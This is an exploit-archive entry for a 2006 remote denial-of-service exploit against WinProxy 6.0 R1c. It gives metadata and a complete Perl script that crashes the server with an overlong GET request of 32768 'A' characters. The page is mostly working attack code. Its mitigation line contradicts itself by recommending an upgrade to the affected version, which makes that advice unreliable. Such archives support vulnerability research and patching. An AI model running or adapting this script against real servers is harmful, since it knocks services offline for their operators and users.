header-logo
Suggest Exploit
vendor:
WinProxy
by:
FistFucker
7.5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: WinProxy
Affected Version From: 6.0 R1c
Affected Version To: 6.0 R1c
Patch Exists: YES
Related CWE: CAN-2005-3187
CPE: a:bluecoat:winproxy:6.0_r1c
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

WinProxy 6.0 R1c Remote DoS Exploit

This exploit sends a GET request with a string of 32768 'A' characters to the server, causing it to crash.

Mitigation:

Upgrade to the latest version of WinProxy 6.0 R1c
Source

Exploit-DB raw data:

#!perl
#
# "WinProxy 6.0 R1c" Remote DoS Exploit
#
# Author:  FistFucker
# e-Mail:  FistFuXXer@gmx.de
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
#
# CVE info:
# CAN-2005-3187
#

use IO::Socket;

#
# destination IP address
#
$ip = '127.0.0.1';

#
# destination TCP port
#
$port = 80;


print '"WinProxy 6.0 R1c" Remote DoS Exploit'."\n\n";

$sock = IO::Socket::INET->new
(

    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
    Timeout  => 2

) or print '[-] Error: Could not establish a connection to the server!' and exit(1);

print "[+] Connected.\n";

$sock->send('GET /'. 'A' x 32768 ." HTTP/1.1\r\n\r\n");

print "[+] DoS string has been sent.";

close($sock);

# milw0rm.com [2006-01-07]